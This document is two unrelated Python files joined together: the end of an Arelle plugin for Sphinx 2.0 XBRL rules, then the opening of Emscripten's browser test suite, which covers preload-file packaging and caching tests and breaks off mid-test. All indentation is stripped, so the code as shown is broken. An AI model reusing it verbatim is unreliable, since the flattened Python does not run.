if not cntlr.modelManager.modelXbrl or cntlr.modelManager.modelXbrl.modelDocument.type not in (
ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
import tkinter.messagebox
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Import requires an opened DTS"), parent=cntlr.parent)
return False
modelXbrl = cntlr.modelManager.modelXbrl
sphinxFiles = sphinxFilesDialog(cntlr)
if not sphinxFiles:
return False
def backgroundParseSphinxFiles():
try:
from .SphinxParser import parse
sphinxProgs = parse(cntlr, modelXbrl.log, sphinxFiles)
try:
modelXbrl.sphinxContext.sphinxProgs.update(sphinxProgs) # add to previously loaded progs
except AttributeError:
from .SphinxContext import SphinxContext
modelXbrl.sphinxContext = SphinxContext(sphinxProgs, modelXbrl) # first sphinxProgs for DTS
except Exception as ex:
cntlr.addToLog(
_("[exception] Sphinx Compiling Exception: %(error)s \n%(traceback)s") %
{"error": ex,
"exc_info": True,
"traceback": traceback.format_tb(sys.exc_info()[2])})
import threading
thread = threading.Thread(target=backgroundParseSphinxFiles)
thread.daemon = True
thread.start()
# Extend menu with an item for the savedts plugin
menu.add_command(label="Import Sphinx files...",
underline=0,
command=sphinxFileMenuCommand)
def sphinxToLBMenuEntender(cntlr, menu):
def sphinxToLBMenuCommand():
import os, sys, traceback
from .FormulaGenerator import generateFormulaLB
sphinxFiles = sphinxFilesDialog(cntlr)
if not sphinxFiles:
return False
generatedFormulasDir = generatedFormulasDirDialog(cntlr)
if not generatedFormulasDir:
return False
def backgroundSphinxGenerateFormula():
try:
generateFormulaLB(cntlr, sphinxFiles, generatedFormulasDir)
except Exception as ex:
cntlr.addToLog(
_("[exception] Sphinx Compiling Exception: %(error)s \n%(traceback)s") %
{"error": ex,
"exc_info": True,
"traceback": traceback.format_tb(sys.exc_info()[2])})
import threading
thread = threading.Thread(target=backgroundSphinxGenerateFormula)
thread.daemon = True
thread.start()
# Extend menu with an item for the savedts plugin
menu.add_command(label="Compile Sphinx to Formula",
underline=0,
command=sphinxToLBMenuCommand)
def sphinxToLBCommandLineOptionExtender(parser):
# extend command line options to import sphinx files into DTS for validation
parser.add_option("--import-sphinx",
action="store",
dest="sphinxFilesForValidation",
help=_("Import sphinx files to the DTS for validation. "
"Multiple file names are separated by a '|' character. "))
# extend command line options with a generate sphinx into formula linkbase option
parser.add_option("--generate-sphinx-formula-linkbase",
action="store",
dest="sphinxFilesForFormulaLinkbase",
help=_("Generate an XBRL formula linkbase from sphinx files. "
"Multiple file names are separated by a '|' character. "
"Files may be xrb archives, xsr source files, or directories of same. "))
parser.add_option("--generated-sphinx-formulas-directory",
action="store",
dest="generatedSphinxFormulasDirectory",
help=_("Generated XBRL formula linkbases directory. "
"(If absent, formula linkbases save in sphinx files directory.) "))
def sphinxToLBCommandLineUtilityRun(cntlr, options):
# extend XBRL-loaded run processing for this option
if getattr(options, "sphinxFilesForFormulaLinkbase", None):
from .FormulaGenerator import generateFormulaLB
generateFormulaLB(cntlr,
options.sphinxFilesForFormulaLinkbase.split("|"),
options.generatedSphinxFormulasDirectory)
def sphinxCommandLineLoader(cntlr, options, modelXbrl):
# DTS loaded, add in sphinx files if any
if getattr(options, "sphinxFilesForValidation", None):
from .SphinxParser import parse
from .SphinxContext import SphinxContext
sphinxProgs = parse(cntlr, modelXbrl.log, options.sphinxFilesForValidation.split('|'))
modelXbrl.sphinxContext = SphinxContext(sphinxProgs, modelXbrl)
def sphinxValidater(val):
if hasattr(val.modelXbrl, "sphinxContext"):
# sphinx is loaded, last step in validation
from .SphinxValidator import validate
validate(val.modelXbrl.log, val.modelXbrl.sphinxContext)
def sphinxTestcaseVariationReadMeFirstUris(modelTestcaseVariation):
xbrlElement = XmlUtil.descendant(modelTestcaseVariation, 'http://www.corefiling.com/sphinx-conformance-harness/2.0', "xbrl")
if xbrlElement is not None:
modelTestcaseVariation._readMeFirstUris.append(xbrlElement.textValue)
return True # found it
return False # not a sphinx test case variation
def sphinxTestcaseVariationExpectedResult(modelTestcaseVariation):
issueElement = XmlUtil.descendant(modelTestcaseVariation, 'http://www.corefiling.com/sphinx-conformance-harness/2.0', "issue")
if issueElement is not None:
return issueElement.get("errorCode")
return None # no issue or not a sphinx test case variation
def sphinxTestcasesStart(cntlr, options, testcasesModelXbrl):
if options and getattr(options, "sphinxFilesForValidation", None): # command line mode
testcasesModelXbrl.sphinxFilesList = options.sphinxFilesForValidation.split('|')
elif (cntlr.hasGui and
testcasesModelXbrl.modelDocument.xmlRootElement.qname.namespaceURI == 'http://www.corefiling.com/sphinx-conformance-harness/2.0' and
not hasattr(testcasesModelXbrl, "sphinxFilesList")):
testcasesModelXbrl.sphinxFilesList = sphinxFilesDialog(cntlr)
def sphinxTestcaseVariationXbrlLoaded(testcasesModelXbrl, instanceModelXbrl):
# variation has been loaded, may need sphinx rules loaded if interactive
try:
sphinxFilesList = testcasesModelXbrl.sphinxFilesList
# load sphinx
from .SphinxParser import parse
sphinxProgs = parse(testcasesModelXbrl.modelManager.cntlr, instanceModelXbrl.log, sphinxFilesList)
from .SphinxContext import SphinxContext
instanceModelXbrl.sphinxContext = SphinxContext(sphinxProgs, instanceModelXbrl) # first sphinxProgs for DTS
except AttributeError:
pass # no sphinx
def sphinxTestcaseVariationExpectedSeverity(modelTestcaseVariation):
issueElement = XmlUtil.descendant(modelTestcaseVariation, 'http://www.corefiling.com/sphinx-conformance-harness/2.0', "issue")
if issueElement is not None:
return issueElement.get("severity")
return None # no issue or not a sphinx test case variation
def sphinxDialogRssWatchFileChoices(dialog, frame, row, options, cntlr, openFileImage, openDatabaseImage):
from tkinter import PhotoImage, N, S, E, W
try:
from tkinter.ttk import Button
except ImportError:
from ttk import Button
from arelle.CntlrWinTooltip import ToolTip
from arelle.UiUtil import gridCell, label
# add sphinx formulas to RSS dialog
def chooseSphinxFiles():
sphinxFilesList = cntlr.uiFileDialog("open",
multiple=True, # expect multiple sphinx files
title=_("arelle - Select sphinx rules file"),
initialdir=cntlr.config.setdefault("rssWatchSphinxRulesFilesDir","."),
filetypes=[(_("Sphinx files .xsr"), "*.xsr"), (_("Sphinx archives .xrb"), "*.xrb")],
defaultextension=".xsr")
if sphinxFilesList:
dialog.options["rssWatchSphinxRulesFilesDir"] = os.path.dirname(sphinxFilesList[0])
sphinxFilesPipeSeparated = '|'.join(sphinxFilesList)
dialog.options["sphinxRulesFiles"] = sphinxFilesPipeSeparated
dialog.cellSphinxFiles.setValue(sphinxFilesPipeSeparated)
else: # deleted
dialog.options.pop("sphinxRulesFiles", "") # remove entry
label(frame, 1, row, "Sphinx rules:")
dialog.cellSphinxFiles = gridCell(frame,2, row, options.get("sphinxRulesFiles",""))
    ToolTip(dialog.cellSphinxFiles, text=_("Select sphinx rules (file(s) or archive(s)) to evaluate each filing. "
"The results are recorded in the log file. "), wraplength=240)
chooseFormulaFileButton = Button(frame, image=openFileImage, width=12, command=chooseSphinxFiles)
chooseFormulaFileButton.grid(row=row, column=3, sticky=W)
def sphinxDialogRssWatchValidateChoices(dialog, frame, row, options, cntlr):
from arelle.UiUtil import checkbox
dialog.checkboxes += (
checkbox(frame, 2, row,
"Sphinx rules",
"validateSphinxRules"),
)
def sphinxRssWatchHasWatchAction(rssWatchOptions):
return rssWatchOptions.get("sphinxRulesFiles") and rssWatchOptions.get("validateSphinxRules")
def sphinxRssDoWatchAction(modelXbrl, rssWatchOptions):
sphinxFiles = rssWatchOptions.get("sphinxRulesFiles")
if sphinxFiles:
from .SphinxParser import parse
sphinxProgs = parse(modelXbrl.modelManager.cntlr, modelXbrl.log, sphinxFiles.split('|'))
from .SphinxContext import SphinxContext
modelXbrl.sphinxContext = SphinxContext(sphinxProgs, modelXbrl) # first sphinxProgs for DTS
# sphinx is loaded, last step in validation
from .SphinxValidator import validate
validate(modelXbrl.log, modelXbrl.sphinxContext)
# plugin changes to model object factory classes
from arelle.ModelTestcaseObject import ModelTestcaseVariation
sphinxModelObjectElementSubstitutionClasses = (
(qname("{http://www.corefiling.com/sphinx-conformance-harness/2.0}variation"), ModelTestcaseVariation),
)
__pluginInfo__ = {
'name': 'Sphinx 2.0 Processor',
'version': '0.9',
'description': "This plug-in provides a Sphinx 2.0 processor and a compiler (of a limited subset of Sphinx) into formula linkbase. ",
'license': 'Apache-2',
'author': 'Mark V Systems Limited',
'copyright': '(c) Copyright 2013 Mark V Systems Limited, All rights reserved.',
# classes of mount points (required)
'ModelObjectFactory.ElementSubstitutionClasses': sphinxModelObjectElementSubstitutionClasses,
'CntlrWinMain.Menu.File.Open': sphinxFilesOpenMenuEntender,
'CntlrWinMain.Menu.Tools': sphinxToLBMenuEntender,
'CntlrCmdLine.Options': sphinxToLBCommandLineOptionExtender,
'CntlrCmdLine.Utility.Run': sphinxToLBCommandLineUtilityRun,
'CntlrCmdLine.Xbrl.Loaded': sphinxCommandLineLoader,
'Validate.Finally': sphinxValidater,
'Testcases.Start': sphinxTestcasesStart,
'TestcaseVariation.Xbrl.Loaded': sphinxTestcaseVariationXbrlLoaded,
'ModelTestcaseVariation.ReadMeFirstUris': sphinxTestcaseVariationReadMeFirstUris,
'ModelTestcaseVariation.ExpectedResult': sphinxTestcaseVariationExpectedResult,
'ModelTestcaseVariation.ExpectedSeverity': sphinxTestcaseVariationExpectedSeverity,
'DialogRssWatch.FileChoices': sphinxDialogRssWatchFileChoices,
'DialogRssWatch.ValidateChoices': sphinxDialogRssWatchValidateChoices,
'RssWatch.HasWatchAction': sphinxRssWatchHasWatchAction,
'RssWatch.DoWatchAction': sphinxRssDoWatchAction
}
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path
from urllib.request import urlopen
from common import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting
from common import create_file, parameterized, ensure_dir, disabled, test_file, WEBIDL_BINDER
from common import read_file, requires_v8, also_with_minimal_runtime, EMRUN
from tools import shared
from tools import ports
from tools.shared import EMCC, WINDOWS, FILE_PACKAGER, PIPE
from tools.shared import try_delete
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
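    # The byte-range branch above follows the HTTP Range header format: a request
    # carrying "Range: bytes=100-199" yields start=100, end=199 (clamped to the
    # data size) and a 100-byte body, matching the Content-Length sent by
    # sendheaders.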
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def also_with_wasmfs(f):
def metafunc(self, wasmfs, *args, **kwargs):
if wasmfs:
self.set_setting('WASMFS')
self.emcc_args = self.emcc_args.copy() + ['-DWASMFS']
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
metafunc._parameterize = {'': (False,),
'wasmfs': (True,)}
return metafunc
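# The _parameterize mapping set above is expanded by the parameterized test
# machinery imported from common (an assumption based on how `parameterized` is
# used elsewhere in this file): each key produces a test variant, e.g. test_foo
# for the default case and test_foo_wasmfs for the -sWASMFS case.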
def also_with_wasm2js(f):
assert callable(f)
def metafunc(self, with_wasm2js):
assert self.get_setting('WASM') is None
if with_wasm2js:
self.set_setting('WASM', 0)
f(self)
else:
f(self)
metafunc._parameterize = {'': (False,),
'wasm2js': (True,)}
return metafunc
def shell_with_script(shell_file, output_file, replacement):
shell = read_file(path_from_root('src', shell_file))
create_file(output_file, shell.replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self, *args, **kwargs)
return decorated
def requires_threads(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
def also_with_threads(f):
def decorated(self, *args, **kwargs):
f(self)
if not os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
print('(threads)')
self.emcc_args += ['-pthread']
f(self, *args, **kwargs)
return decorated
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.browser_timeout = 60
if EMTEST_BROWSER != 'node':
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def setUp(self):
super().setUp()
# avoid various compiler warnings that many browser tests currently generate
self.emcc_args += [
'-Wno-pointer-sign',
'-Wno-int-conversion',
]
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
    # TODO: This test verifies behavior that will be deprecated at some point in the future;
    # remove this test once system JS libraries are no longer automatically linked.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-sUSE_SDL', '-lGL']) # is the default anyhow
def test_sdl1_es6(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-sUSE_SDL', '-lGL', '-sEXPORT_ES6'])
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
create_file(cpp_file, r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-gsource-map'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with --save-dir for the reload).
''')
def test_emscripten_log(self):
self.btest_exit(test_file('emscripten_log/emscripten_log.cpp'),
args=['--pre-js', path_from_root('src/emscripten-source-map.min.js'), '-gsource-map'])
@also_with_wasmfs
def test_preload_file(self):
create_file('somefile.txt', 'load me right before running the code please')
create_file('.somefile.txt', 'load me right before running the code please')
create_file('some@file.txt', 'load me right before running the code please')
absolute_src_path = os.path.abspath('somefile.txt')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
# TODO: change this when wasmfs supports relative paths.
if self.get_setting('WASMFS'):
path = "/" + path
create_file('main.cpp', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return 0;
}
''' % path)
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.btest_exit('main.cpp', args=['--preload-file', srcpath])
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
create_file(tricky_filename, 'load me right before running the code please')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.btest_exit('main.cpp', args=['--preload-file', tricky_filename.replace('@', '@@')])
# TODO: WASMFS doesn't support the rest of this test yet. Exit early.
if self.get_setting('WASMFS'):
return
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.btest_exit('main.cpp', args=['--preload-file', absolute_src_path])
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_file('main.cpp', r'''
#include <stdio.h>
#include <assert.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
f = fopen("%s", "r");
assert(f != NULL);
fclose(f);
f = fopen("%s", "r");
assert(f == NULL);
return 0;
}
''' % (path1, path2, nonexistingpath))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.btest_exit('main.cpp', args=['--preload-file', srcpath, '--exclude-file', '*/.*'])
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'], reporting=Reporting.JS_ONLY)
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?exit:0')
# With FS.preloadFile
create_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.btest_exit('main.cpp', args=['--pre-js', 'pre.js', '--use-preload-plugins'])
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
@parameterized({
'default': ([],),
'pthreads': (['-pthread', '-sPROXY_TO_PTHREAD', '-sEXIT_RUNTIME'],),
})
@requires_threads
def test_preload_file_with_manual_data_download(self, args):
src = test_file('manual_download_data.cpp')
create_file('file.txt', '''Hello!''')
self.compile_btest([src, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'] + args)
shutil.copyfile(test_file('manual_download_data.html'), 'manual_download_data.html')
# Move .data file out of server root to ensure that getPreloadedPackage is actually used
os.mkdir('test')
shutil.move('manual_download_data.data', 'test/manual_download_data.data')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by
# correctly escaping the names.
def test_output_file_escaping(self):
self.set_setting('EXIT_RUNTIME')
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.abspath(d)
ensure_dir(abs_d)
txt = 'file with ' + tricky_part + '.txt'
create_file(os.path.join(d, txt), 'load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
create_file(cpp, r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"')))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
abs_txt = os.path.join(abs_d, txt)
self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.abspath(page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-sFORCE_FILESYSTEM'], reporting=Reporting.JS_ONLY)
self.run_browser(page_file, '|load me right before|.', '/report_result?exit:0')
@parameterized({
'0': (0,),
'1mb': (1 * 1024 * 1024,),
'100mb': (100 * 1024 * 1024,),
'150mb': (150 * 1024 * 1024,),
})
def test_preload_caching(self, extra_size):
self.set_setting('EXIT_RUNTIME')
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern int checkPreloadResults();
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return checkPreloadResults();
}
''' % 'somefile.txt')
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
if is_chrome() and extra_size >= 100 * 1024 * 1024:
self.skipTest('chrome bug')
create_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.c', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-sALLOW_MEMORY_GROWTH'], reporting=Reporting.JS_ONLY)
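    # The first load populates the IndexedDB preload cache (checkPreloadResults
    # reports 0 cached packages); the reload is then served from the cache and
    # reports 1, which is why the expected exit codes below differ.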
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:0')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:1')
def test_preload_caching_indexeddb_name(self):
self.set_setting('EXIT_RUNTIME')
create_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern int checkPreloadResults();
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
assert(strcmp("load me right before", buf) == 0);
return checkPreloadResults();
}
''' % path)
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.c', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-sFORCE_FILESYSTEM'], reporting=Reporting.JS_ONLY)
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:0')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:1')
def test_multifile(self):
# a few files inside a directory
ensure_dir('subdirr/moar')
create_file('subdirr/data1.txt', '1214141516171819')
create_file('subdirr/moar/data2.txt', '3.14159265358979')
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
assert(strcmp("1214141516171819", buf) == 0);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
assert(strcmp("3.14159265358979", buf) == 0);
return 0;
}
''')
# by individual files
self.btest_exit('main.c', args=['--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt'])
# by directory, and remove files to make sure
self.set_setting('EXIT_RUNTIME')
self.compile_btest(['main.c', '--preload-file', 'subdirr', '-o', 'page.html'], reporting=Reporting.JS_ONLY)
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?exit:0')
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_file(Path('subdirr/data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
default_shell = read_file(path_from_root('src/shell.html'))
create_file('shell.html', default_shell.replace('var Module = {', '''
var Module = {
locateFile: function(path, prefix) {
if (path.endsWith(".wasm")) {
return prefix + path;
} else {
return "cdn/" + path;
}
},
'''))
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
assert(strcmp("1214141516171819", buf) == 0);
